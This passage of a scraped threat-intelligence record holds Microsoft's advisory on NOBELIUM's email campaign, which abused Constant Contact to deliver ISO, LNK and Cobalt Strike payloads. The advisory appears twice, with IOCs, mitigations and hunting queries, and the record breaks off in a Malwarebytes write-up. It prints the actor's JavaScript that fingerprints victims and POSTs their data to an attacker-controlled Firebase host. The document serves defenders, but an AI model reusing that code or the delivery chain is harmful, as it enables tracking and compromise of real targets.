center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2QzQqCUBCFzzroHURaS7Ro5y6DFraJHkDUzH6uoJabHr7PMWojIQN3fs-ZMzfSXYlK3XRUzbuT00mVPM010wvf6aycXk48zGzoDyhHLcQ8-XRWWirAN1rjHYiW-o_pAm7AXM1nIHvvjN9T9NUS6UnNgW-oV4ZZUM_R1sK9N-6OTg1XTNZgiQqinfGGzNdwFaifghi_92AqMsvjj7YtcX__-C_0WaDUNDdsTOyKIe-z1NSkhvUnbP2_7WE3lMwGXFLxa77e-0liDdIBAAA&runQuery=true&timeRangeId=week> \"https://security.microsoft.com/hunting?query=h4siaaaaaaaeai2qzqqcubcfzzrohuras7ro5y6dfrajhkduzh6uojabhr7pmwojiqn3fs-zmzfsxylk3xruzbut00mvpm010wvf6aycxk48zgzodyhhlcq8-xrwwiran1rjhyiw-o_pam7axm1nihvvjn9t9nus6unngw-ov4zzum_r1sk9n-6otg1xtnzgiqqinfggzndwfaifghi_92aqmsvjj7ytcx__-c_0wadunddstoykie-z1nskhvunbp2_7we3lmwgxflxa77e-0liddibaaa&runquery=true&timerangeid=week\" )\n\n`EmailUrlInfo \n| where UrlDomain == \"r20.rs6.net\" \n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId \n| where SenderMailFromDomain == \"in.constantcontact.com\" \n| where SenderFromDomain == \"usaid.gov\" `\n\n##### NOBELIUM subject lines used in abuse of Constant Contact service\n\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. It also specifies email subject keywords seen in phishing campaigns in late May using the term \u201cSpecial Alert!\u201d in various ways in the subject. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2SS2vCQBSFz1rofwihiwoSpItuiguhCi7sRruWaX1UjRNJYkXoj-83d6RkYUoJw32eM-feTK6VaiWa6aR37Yg-iOfYUgdVVAacoxz5vRbYks_pQvZBKbijYbbkcuIeZ4gX8DV-V8-6U0cj2Bxdud6o5JrIa63Cat9wnfVpmBV-7HihGjHeVAQdKZVH9ZVhKz1hvelPf3l2oCJib3YJLlhv7ElDx0hf5DzoMGVhmHtTviaX6dWYz1RKuKZEFZ_TBm9ivAP6S7g2aP8P4tasM9OwtHh6VTbGD7Pf3kCIMjYeFFfc52yGGNf2n-pr_dDYS9udf991Mv1bejOmKNhYG2Pz9SRUHMiFaYsvpe19dfUDjw6wVYICAAA&runQuery=true&timeRangeId=week> \"https://security.microsoft.com/hunting?query=h4siaaaaaaaeai2ss2vcqbsfz1rofwihiwospituiguhci7srruwax1ujrnjykxoj-83d6rkyuojw32em-fetk6vaiwa6ar37yg-iofyugdvvaacoxz5vrbyks_pqvzbkbijybbkcuiez4gx8dv-v8-6u0cj2bxdud6o5jria63cat9wnfvpmbv-7hihgjhevaqdkzvh9zvhkz1hvelpf3l2ocjib3yjllhv7eldx0hf5dzomgvhmhttviax6dwyz1rkukzefz_tbm9ivap6s7g2ap8p4tasm9owthh6vtbgd7pf3kcimjyefffc52yggnf2n-pr_ddys9udf991mv1bejomknhyg2pz9sruhmifaysvpe19dfudjw6wvyicaaa&runquery=true&timerangeid=week\" )\n\n`let SubjectTerms = pack_array (\"Special\",\"Alert\"); \nEmailUrlInfo \n| where UrlDomain == \"r20.rs6.net\" \n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId \n| where SenderMailFromDomain == \"in.constantcontact.com\" \n| where SenderFromDomain == \"usaid.gov\" \n| where Subject has_any (SubjectTerms) `\n\n### Azure Sentinel\n\n##### NOBELIUM exploitation search using Azure Sentinel\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/NOBELIUM_IOCsMay2021.yaml> \"https://github.com/azure/azure-sentinel/blob/master/detections/multipledatasources/nobelium_iocsmay2021.yaml\" ).\n\n## MITRE ATT&amp;CK techniques observed\n\nThis threat makes use of attacker techniques documented in the [MITRE ATT&amp;CK framework](<https://attack.mitre.org/>).\n\n### Initial access\n\n * [T1566.003 Phishing: Spearphishing via Service](<https://attack.mitre.org/techniques/T1566/003/>)\u2014NOBELIUM used the legitimate mass mailing service, Constant Contact to send their emails.\n * [T1566.002 Phishing: Spearphishing Link](<https://attack.mitre.org/techniques/T1566/002/>)\u2014The emails sent by NOBELIUM includes a URL that directs a user to the legitimate Constant Contact service that redirects to NOBELIUM-controlled infrastructure.\n\n### Execution\n\n * [T1610 Deploy Container](<https://attack.mitre.org/techniques/T1610/>)\u2014Payload is delivered via an ISO file which is mounted on target computers.\n * [T1204.001 User Execution: Malicious Link](<https://attack.mitre.org/techniques/T1204/001/>)\u2014Cobalt Strike Beacon payload is executed via a malicious link (LNK) file.\n\n### Command and control\n\n * [T1071.001 Application Layer Protocol: Web Protocols](<https://attack.mitre.org/techniques/T1071/001/>)\u2014Cobalt Strike Beacons call out to attacker infrastructure via port 443.\n\n## Learn more\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [New sophisticated email-based attack from NOBELIUM](<https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-28T00:00:50", "type": "mssecure", "title": "New sophisticated email-based attack from NOBELIUM", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-05-28T00:00:50", "id": "MSSECURE:6A79615935EB4546087AB44569C7B207", "href": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "mmpc": [{"lastseen": "2021-06-01T20:32:02", "description": "Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind the attacks against SolarWinds, the [SUNBURST backdoor](<https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/>), [TEARDROP malware](<https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/>), [GoldMax malware](<https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/>), and other related components. The campaign, initially observed and tracked by Microsoft since January 2021, evolved over a series of waves demonstrating significant experimentation. On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, [Constant Contact](<https://www.constantcontact.com/>), to masquerade as a US-based development organization and distribute malicious URLs to a wide variety of organizations and industry verticals.\n\nMicrosoft is issuing this alert and new security research regarding this sophisticated [email-based campaign that NOBELIUM has been operating](<https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/>) to help the industry understand and protect from this latest activity. Below, we have outlined attacker motives, malicious behavior, and best practices to protect against this attack. You can also find more information on the [Microsoft On The Issues blog](<https://blogs.microsoft.com/on-the-issues/?p=64692>).\n\n> Note: This is an active incident. We will post more details here as they become available.\n> \n> _**Update [05/28/2021]**: We published a new blog post detailing [NOBELIUM&#x27;s latest early-stage toolset](<https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/>), composed of four tools utilized in a unique infection chain: EnvyScout, BoomBox, NativeZone, and VaporRage. _\n\nNOBELIUM has historically targeted government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. With this latest attack, NOBELIUM attempted to target approximately 3,000 individual accounts across more than 150 organizations, employing an [established pattern](<https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/>) of using unique infrastructure and tooling for each target, increasing their ability to remain undetected for a longer period of time.\n\nThis new wide-scale email campaign leverages the legitimate service Constant Contact to send malicious links that were obscured behind the mailing service\u2019s URL (many email and document services provide a mechanism to simplify the sharing of files, providing insights into who and when links are clicked). Due to the high volume of emails distributed in this campaign, automated email threat detection systems blocked most of the malicious emails and marked them as spam. However, some automated threat detection systems may have successfully delivered some of the earlier emails to recipients either due to configuration and policy settings or prior to detections being in place.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) delivers coordinated defense against this threat. [Microsoft Defender for Office 365](<https://www.microsoft.com/en-us/microsoft-365/security/office-365-defender>) detects the malicious emails, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) detects the malware and malicious behaviors. Due to the fast-moving nature of this campaign and its perceived scope, Microsoft encourages organizations to investigate and monitor communications matching characteristics described in this report and take the actions described below in this article.\n\nWe continue to see an increase in sophisticated and [nation-state-sponsored attacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) and, as part of our ongoing threat research and efforts to protect customers, we will continue to [provide guidance](<https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/>) to the security community on how to secure against and respond to these multi-dimensional attacks.\n\n## Spear-phishing campaign delivers NOBELIUM payloads\n\nThe NOBELIUM campaign observed by MSTIC and detailed in this blog differs significantly from the NOBELIUM operations that ran from September 2019 until January 2021, which included the compromise of the SolarWinds Orion platform. It is likely that these observations represent changes in the actor\u2019s tradecraft and possible experimentation following widespread disclosures of previous incidents. \n\n### Early testing and initial discovery\n\nAs part of the initial discovery of the campaign in February, MSTIC identified a wave of phishing emails that leveraged the Google Firebase platform to stage an ISO file containing malicious content, while also leveraging this platform to record attributes of those who accessed the URL. MSTIC traced the start of this campaign to January 28, 2021, when the actor was seemingly performing early reconnaissance by only sending the tracking portion of the email, leveraging Firebase URLs to record targets who clicked. No delivery of a malicious payload was observed during this early activity.\n\n### Evolving delivery techniques\n\nIn the next evolution of the campaign, MSTIC observed NOBELIUM attempting to compromise systems through an HTML file attached to a spear-phishing email. When opened by the targeted user, a JavaScript within the HTML wrote an ISO file to disc and encouraged the target to open it, resulting in the ISO file being mounted much like an external or network drive. From here, a shortcut file (LNK) would execute an accompanying DLL, which would result in Cobalt Strike Beacon executing on the system.\n\n\n\n_Figure 1. Example Flow of HMTL/ISO infection chain._\n\nHere&#x27;s an example of target fingerprinting code leveraging Firebase:\n\n`try { \nlet sdfgfghj = ''; \nlet kjhyui = new XMLHttpRequest(); \nkjhyui.open('GET', 'https://api.ipify.org/?format=jsonp?callback=?', false); \nkjhyui.onreadystatechange = function (){ \nsdfgfghj = this.responseText; \n} \nkjhyui.send(null); \nlet ioiolertsfsd = navigator.userAgent; \nlet uyio = window.location.pathname.replace('/',''); \nvar ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj}; \nctryur = JSON.stringify(ctryur); \nlet sdfghfgh = new XMLHttpRequest(); \nsdfghfgh.open('POST', 'https://eventbrite-com-default-rtdb.firebaseio.com/root.json', false); \nsdfghfgh.setRequestHeader('Content-Type', 'application/json'); \nsdfghfgh.send(ctryur); \n} catch (e) {}`\n\nSimilar spear-phishing campaigns were detected throughout March, which included the NOBELIUM actor making several alterations to the accompanying HTML document based on the intended target. MSTIC also observed the actor experimenting with removing the ISO from Firebase, and instead encoding it within the HTML document. Similarly, the actor experimented with redirecting the HTML document to an ISO, which contained an RTF document, with the malicious Cobalt Strike Beacon DLL encoded within the RTF. In one final example of experimentation, there was no accompanying HTML in the phishing email and instead a URL led to an independent website spoofing the targeted organizations, from where the ISO was distributed.\n\nThe phishing message and delivery method was not the only evolving factor in the campaign. In one of the more targeted waves, no ISO payload was delivered, but additional profiling of the target device was performed by an actor-controlled web server after a user clicked the link. If the device targeted was an Apple iOS device, the user was redirected to another server under NOBELIUM control, where the since-patched zero-day exploit for CVE-2021-1879 was served.\n\n### Escalated targeting and delivery\n\nExperimentation continued through most of the campaign but began to escalate in April 2021. During the waves in April, the actor abandoned the use of Firebase, and no longer tracked users using a dedicated URL. Their techniques shifted to encode the ISO within the HTML document and have that responsible for storing target host details on a remote server via the use of the _api.ipify.org_ service. The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.\n\nIn May 2021, the actor changed techniques once more by maintaining the HTML and ISO combination, but dropped a custom .NET first-stage implant, detected as TrojanDownloader:MSIL/BoomBox, that reported host-based reconnaissance data to, and downloaded additional payloads from, the Dropbox cloud storage platform.\n\nOn May 25, the NOBELIUM campaign escalated significantly. Using the legitimate mass mailing service Constant Contact, NOBELIUM attempted to target around 3,000 individual accounts across more than 150 organizations. Due to the high-volume campaign, automated systems blocked most of the emails and marked them as spam. However, automated systems might have successfully delivered some of the earlier emails to recipients.\n\nIn the May 25 campaign, there were several iterations. In one example the emails appear to originate from USAID _&lt;ashainfo@usaid.gov&gt;,_ while having an authentic sender email address that matches the standard Constant Contact service. This address (which varies for each recipient) ends in _@in.constantcontact.com_, and (which varies for each recipient), and a Reply-To address of &lt;_mhillary@usaid.gov&gt;_ was observed. The emails pose as an alert from USAID, as seen below.\n\n\n\n_Figure 2. Example email screenshot._\n\nIf the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service, which follows this pattern:\n\n_https://r20.rs6[.]net/tn.jsp?f=_\n\nThe user is then redirected to NOBELIUM-controlled infrastructure, with a URL following this pattern:\n\n_https://usaid.theyardservice[.]com/d/&lt;target_email_address&gt;_\n\nA malicious ISO file is then delivered to the system. Within this ISO file are the following files that are saved in the _%USER%\\__AppData\\Local\\Temp\\&lt;random folder name&gt;\\_ path:\n\n * A shortcut, such as _Reports.lnk_, that executes a custom Cobalt Strike Beacon loader\n * A decoy document, such as _ica-declass.pdf_, that is displayed to the target\n * A DLL, such as _Document.dll_, that is a custom Cobalt Strike Beacon loader dubbed NativeZone by Microsoft\n\n\n\n_Figure 3. ISO file contents. It is worth noting that the \u201cDocuments.dll\u201d is a hidden file._\n\n\n\n_Figure 4. Shortcut which executes the hidden DLL file._\n\nThe end result when detonating the LNK file is the execution of \u201cC:\\Windows\\system32\\rundll32.exe Documents.dll,Open\u201d.\n\nThe successful deployment of these payloads enables NOBELIUM to achieve persistent access to compromised systems. Then, the successful execution of these malicious payloads could enable NOBELIUM to conduct action-on objectives, such as lateral movement, data exfiltration, and delivery of additional malware.\n\nIndicators of compromise (IOCs) for the campaign occurring on May 25 are provided in this blog to help security teams to identify actor activity.\n\nMicrosoft security researchers assess that the NOBELIUM\u2019s spear-phishing operations are recurring and have increased in frequency and scope. It is anticipated that additional activity may be carried out by the group using an evolving set of tactics.\n\nMicrosoft continues to monitor this threat actor\u2019s evolving activities and will update as necessary. [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) protects customers against the multiple components of this threat: malicious emails, file attachments, connections, malware payloads, other malicious artifacts, and attacker behavior. Refer to the detection details below for specific detection names and alerts. Additionally, customers should follow defensive guidance and leverage advanced hunting to help mitigate variants of actor activity.\n\n## Mitigations\n\nApply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Run [EDR in block mode ](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>)so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. (EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.)\n * Enable [network protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable[ investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery ](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>)to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n * Enable multifactor authentication (MFA) to mitigate compromised credentials. Microsoft strongly encourages all customers download and use passwordless solutions like Microsoft Authenticator to [secure your accounts](<https://www.microsoft.com/en-us/account/authenticator/>).\n * For Office 365 users, see [multifactor authentication support](<https://docs.microsoft.com/en-us/microsoft-365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365-worldwide&viewFallbackFrom=o365worldwide>).\n * For Consumer and Personal email accounts, see how to use [two-step verification](<https://support.microsoft.com/en-us/account-billing/how-to-use-two-step-verification-with-your-microsoft-account-c7910146-672f-01e9-50a0-93b4585e7eb4>).\n * Turn on the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) to block or audit activity associated with this threat: _Block all Office applications from creating child processes_. NOTE: [Assess rule impact](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/evaluate-attack-surface-reduction?view=o365-worldwide>) before deployment.\n\n## Indicators of compromise (IOC)\n\nThis attack is still active, so these indicators should not be considered exhaustive for this observed activity. These indicators of compromise are from the large-scale campaign launched on May 25, 2021.\n\n \n\nINDICATOR | TYPE | DESCRIPTION \n---|---|--- \nashainfo@usaid.gov | Email | Spoofed email account \nmhillary@usaid.gov | Email | Spoofed email account \n2523f94bd4fba4af76f4411fe61084a7e7d80dec163c9ccba9226c80b8b31252 | SHA-256 | Malicious ISO file (container) \nd035d394a82ae1e44b25e273f99eae8e2369da828d6b6fdb95076fd3eb5de142 | SHA-256 | Malicious ISO file (container) \n94786066a64c0eb260a28a2959fcd31d63d175ade8b05ae682d3f6f9b2a5a916 | SHA-256 | Malicious ISO file (container) \n48b5fb3fa3ea67c2bc0086c41ec755c39d748a7100d71b81f618e82bf1c479f0 | SHA-256 | Malicious shortcut (LNK) \nee44c0692fd2ab2f01d17ca4b58ca6c7f79388cbc681f885bb17ec946514088c | SHA-256 | Cobalt Strike Beacon malware \nee42ddacbd202008bcc1312e548e1d9ac670dd3d86c999606a3a01d464a2a330 | SHA-256 | Cobalt Strike Beacon malware \nusaid.theyardservice[.]com | Domain | Subdomain used to distribute ISO file \nworldhomeoutlet[.]com | Domain | Subdomain in Cobalt Strike C2 \ndataplane.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \ncdn.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \nstatic.theyardservice[.]com | Domain | Subdomain in Cobalt Strike C2 \n192[.]99[.]221[.]77 | IP address | IP resolved to by _worldhomeoutlet[.]com_ \n83[.]171[.]237[.]173 | IP address | IP resolved to by *_theyardservice[.]com_ \ntheyardservice[.]com | Domain | Actor controlled domain \n \n## Detection details\n\n### Antivirus\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [Trojan:Win32/NativeZone.C!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/NativeZone.C!dha&threatId=-2147185566>)\n\n### Endpoint detection and response (EDR)\n\nAlerts with the following titles in the Security Center can indicate threat activity on your network:\n\n * Malicious ISO File used by NOBELIUM\n * Cobalt Strike Beacon used by NOBELIUM\n * Cobalt Strike network infrastructure used by NOBELIUM\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * An uncommon file was created and added to startup folder.\n * A link file (LNK) with unusual characteristics was opened.\n\n## Advanced hunting\n\n### Microsoft 365 Defender\n\n**NOTE:** The following sample queries lets you search for a week&#x27;s worth of events. To explore up to 30 days\u2019 worth of raw data to inspect events in your network and locate potential NOBELIUM mass email-related indicators for more than a week, go to the **Advanced Hunting** page &gt; **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\nTo locate possible exploitation activity, run the following query in the Microsoft 365 security center:\n\n##### NOBELIUM abuse of USAID Constant Contact resources in email data\n\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2QzQqCUBCFzzroHURaS7Ro5y6DFraJHkDUzH6uoJabHr7PMWojIQN3fs-ZMzfSXYlK3XRUzbuT00mVPM010wvf6aycXk48zGzoDyhHLcQ8-XRWWirAN1rjHYiW-o_pAm7AXM1nIHvvjN9T9NUS6UnNgW-oV4ZZUM_R1sK9N-6OTg1XTNZgiQqinfGGzNdwFaifghi_92AqMsvjj7YtcX__-C_0WaDUNDdsTOyKIe-z1NSkhvUnbP2_7WE3lMwGXFLxa77e-0liDdIBAAA&runQuery=true&timeRangeId=week> \"https://security.microsoft.com/hunting?query=h4siaaaaaaaeai2qzqqcubcfzzrohuras7ro5y6dfrajhkduzh6uojabhr7pmwojiqn3fs-zmzfsxylk3xruzbut00mvpm010wvf6aycxk48zgzodyhhlcq8-xrwwiran1rjhyiw-o_pam7axm1nihvvjn9t9nus6unngw-ov4zzum_r1sk9n-6otg1xtnzgiqqinfggzndwfaifghi_92aqmsvjj7ytcx__-c_0wadunddstoykie-z1nskhvunbp2_7we3lmwgxflxa77e-0liddibaaa&runquery=true&timerangeid=week\" )\n\n`EmailUrlInfo \n| where UrlDomain == \"r20.rs6.net\" \n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId \n| where SenderMailFromDomain == \"in.constantcontact.com\" \n| where SenderFromDomain == \"usaid.gov\" `\n\n##### NOBELIUM subject lines used in abuse of Constant Contact service\n\nLooks for recent emails to the organization that originate from the original Constant Contact sending infrastructure and specifically from the organization that had accounts spoofed or compromised in the campaign detailed in this report. It also specifies email subject keywords seen in phishing campaigns in late May using the term \u201cSpecial Alert!\u201d in various ways in the subject. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2SS2vCQBSFz1rofwihiwoSpItuiguhCi7sRruWaX1UjRNJYkXoj-83d6RkYUoJw32eM-feTK6VaiWa6aR37Yg-iOfYUgdVVAacoxz5vRbYks_pQvZBKbijYbbkcuIeZ4gX8DV-V8-6U0cj2Bxdud6o5JrIa63Cat9wnfVpmBV-7HihGjHeVAQdKZVH9ZVhKz1hvelPf3l2oCJib3YJLlhv7ElDx0hf5DzoMGVhmHtTviaX6dWYz1RKuKZEFZ_TBm9ivAP6S7g2aP8P4tasM9OwtHh6VTbGD7Pf3kCIMjYeFFfc52yGGNf2n-pr_dDYS9udf991Mv1bejOmKNhYG2Pz9SRUHMiFaYsvpe19dfUDjw6wVYICAAA&runQuery=true&timeRangeId=week> \"https://security.microsoft.com/hunting?query=h4siaaaaaaaeai2ss2vcqbsfz1rofwihiwospituiguhci7srruwax1ujrnjykxoj-83d6rkyuojw32em-fetk6vaiwa6ar37yg-iofyugdvvaacoxz5vrbyks_pqvzbkbijybbkcuiez4gx8dv-v8-6u0cj2bxdud6o5jria63cat9wnfvpmbv-7hihgjhevaqdkzvh9zvhkz1hvelpf3l2ocjib3yjllhv7eldx0hf5dzomgvhmhttviax6dwyz1rkukzefz_tbm9ivap6s7g2ap8p4tasm9owthh6vtbgd7pf3kcimjyefffc52yggnf2n-pr_ddys9udf991mv1bejomknhyg2pz9sruhmifaysvpe19dfudjw6wvyicaaa&runquery=true&timerangeid=week\" )\n\n`let SubjectTerms = pack_array (\"Special\",\"Alert\"); \nEmailUrlInfo \n| where UrlDomain == \"r20.rs6.net\" \n| join kind=inner EmailEvents on $left.NetworkMessageId==$right.NetworkMessageId \n| where SenderMailFromDomain == \"in.constantcontact.com\" \n| where SenderFromDomain == \"usaid.gov\" \n| where Subject has_any (SubjectTerms) `\n\n### Azure Sentinel\n\n##### NOBELIUM exploitation search using Azure Sentinel\n\nTo locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this [GitHub repository](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/NOBELIUM_IOCsMay2021.yaml> \"https://github.com/azure/azure-sentinel/blob/master/detections/multipledatasources/nobelium_iocsmay2021.yaml\" ).\n\n## MITRE ATT&amp;CK techniques observed\n\nThis threat makes use of attacker techniques documented in the [MITRE ATT&amp;CK framework](<https://attack.mitre.org/>).\n\n### Initial access\n\n * [T1566.003 Phishing: Spearphishing via Service](<https://attack.mitre.org/techniques/T1566/003/>)\u2014NOBELIUM used the legitimate mass mailing service, Constant Contact to send their emails.\n * [T1566.002 Phishing: Spearphishing Link](<https://attack.mitre.org/techniques/T1566/002/>)\u2014The emails sent by NOBELIUM includes a URL that directs a user to the legitimate Constant Contact service that redirects to NOBELIUM-controlled infrastructure.\n\n### Execution\n\n * [T1610 Deploy Container](<https://attack.mitre.org/techniques/T1610/>)\u2014Payload is delivered via an ISO file which is mounted on target computers.\n * [T1204.001 User Execution: Malicious Link](<https://attack.mitre.org/techniques/T1204/001/>)\u2014Cobalt Strike Beacon payload is executed via a malicious link (LNK) file.\n\n### Command and control\n\n * [T1071.001 Application Layer Protocol: Web Protocols](<https://attack.mitre.org/techniques/T1071/001/>)\u2014Cobalt Strike Beacons call out to attacker infrastructure via port 443.\n\n## Learn more\n\nTo learn more about Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nThe post [New sophisticated email-based attack from NOBELIUM](<https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-28T00:00:50", "type": "mmpc", "title": "New sophisticated email-based attack from NOBELIUM", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1879"], "modified": "2021-05-28T00:00:50", "id": "MMPC:6A79615935EB4546087AB44569C7B207", "href": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "malwarebytes": [{"lastseen": "2021-05-28T18:16:34", "description": "Nobelium is a synthetic chemical element with the symbol No and atomic number 102. It is named in honor of Alfred Nobel. But it is also the name given to the threat actor that is behind the attacks against [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>), the [Sunburst](<https://blog.malwarebytes.com/detections/backdoor-sunburst/>)[ backdoor](<https://blog.malwarebytes.com/detections/backdoor-sunburst/>), TEARDROP malware, GoldMax malware, other [related components](<https://blog.malwarebytes.com/malwarebytes-news/2021/01/malwarebytes-targeted-by-nation-state-actor-implicated-in-solarwinds-breach-evidence-suggests-abuse-of-privileged-access-to-microsoft-office-365-and-azure-environments/>).\n\nMicrosoft Threat Intelligence Center (MSTIC) has issued a warning stating that it has uncovered a wide-scale malicious email campaign operated by NOBELIUM. In this campaign NOBELIUM leveraged the legitimate mass-mailing service Constant Contact. This allowed the threat actor to masquerade as a US-based development organization to distribute malicious URLs to a wide variety of organizations and industry verticals.\n\n### The campaign\n\nThis new 